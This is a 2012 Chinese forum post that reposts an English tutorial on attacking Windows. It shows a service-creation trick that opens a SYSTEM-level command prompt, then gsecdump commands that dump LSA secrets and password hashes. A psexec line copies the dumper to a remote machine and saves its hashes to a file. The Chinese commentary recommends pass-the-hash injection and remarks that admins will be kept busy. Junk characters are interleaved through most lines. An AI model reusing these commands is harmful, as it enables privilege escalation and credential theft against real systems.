o get a DOS Prompt as NT system:2 {0 T; Q; m% V, K
) X0 ^* s% [$ j+ X4 T9 v$ g* y
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact4 m t" M) k8 |- b' h: C0 `
[SC] CreateService SUCCESS
, J3 K# H* [0 X2 H6 ]- U4 H( {0 N3 V. B* V: _8 |4 Y I$ k
C:\>sc start shellcmdline
" K0 J$ J& \0 |8 v! N% m[SC] StartService FAILED 1053:% {3 M f( T6 [3 [# b
0 X0 l$ A7 O7 ]* wThe service did not respond to the start or control request in a timely fashion.; V1 }' d$ W- A* k
* U2 j& F1 P8 ^C:\>sc delete shellcmdline
0 G2 R7 _ w9 `# V/ S4 V[SC] DeleteService SUCCESS
# H, t# [5 V( j6 \' d' z6 r4 R1 n2 z8 _- y6 B9 b
------------
9 H' J9 y0 K+ e' x
2 [! T( z' M" }7 u! ^Then in the new DOS window:8 ` W" A# W/ x. Y" u: l9 q& e4 ?
' t& Y6 @- ~; k$ y
Microsoft Windows XP [Version 5.1.2600]9 }! T1 F, R% w2 A
(C) Copyright 1985-2001 Microsoft Corp.
+ H H( s6 O- ]: ^- ?* J# y) h" {3 r1 e2 V8 O) P
C:\WINDOWS\system32>whoami! V6 H; Y2 t! k" `6 q
NT AUTHORITY\SYSTEM! B) q- j: Q: S, {2 g0 `% D& t
* g0 j4 \/ P0 j+ l* ]2 \5 y
C:\WINDOWS\system32>gsecdump -h
3 F9 H% L' B+ x% G2 ?gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
/ n! H! t( }7 t2 f+ f6 ]usage: gsecdump [options]$ A. n- H- p: M9 \5 I% g
) ]- {; D! l6 i3 ~5 v$ m3 }+ \options:# T+ A' }9 S3 ? h8 A; s7 I
-h [ --help ] show help
( O* b3 k. P3 s- |6 A* a, H-a [ --dump_all ] dump all secrets A$ Y3 D- M8 g0 d
-l [ --dump_lsa ] dump lsa secrets9 T! B5 a9 K7 Z9 \8 ` H9 _
-w [ --dump_wireless ] dump microsoft wireless connections E& W# q+ Z: f7 S
-u [ --dump_usedhashes ] dump hashes from active logon sessions% ^2 P( t, H, {" V- d
-s [ --dump_hashes ] dump hashes from SAM/AD% M f, o1 t/ U
6 _# O2 |, c# H# OAlthough I like to use:% \2 t6 x) s) H+ R6 k2 r1 @
2 x1 g( b. S0 M7 ^8 I* U2 B8 s
PsExec v1.83 - Execute processes remotely
3 o3 t# H$ G0 ]* I/ DCopyright (C) 2001-2007 Mark Russinovich9 L8 |9 U$ ^( C G: d+ B
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
+ ^& v6 B* z) ^5 p& y* C4 e
+ d, ?2 L% o' E) kC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 U# e7 d% h/ j. \
' X9 n. A/ ^3 K+ ^
to get the hashes from active logon sessions of a remote system.' C! n# C1 X) M2 H% F
% G) G+ B( I' s5 ^( {These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
' V" t& w! |$ N% m3 u0 m, z3 |4 {1 v2 V$ m7 H. k: Y0 d- t
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了./ `4 L' C9 R4 O# U8 j
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
$ d$ w7 [% H- d, p }% Y$ F7 A# F( q- z
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
: {$ C c% g" a |
发表于 2012-11-6 21:09:29
收藏
支持
反对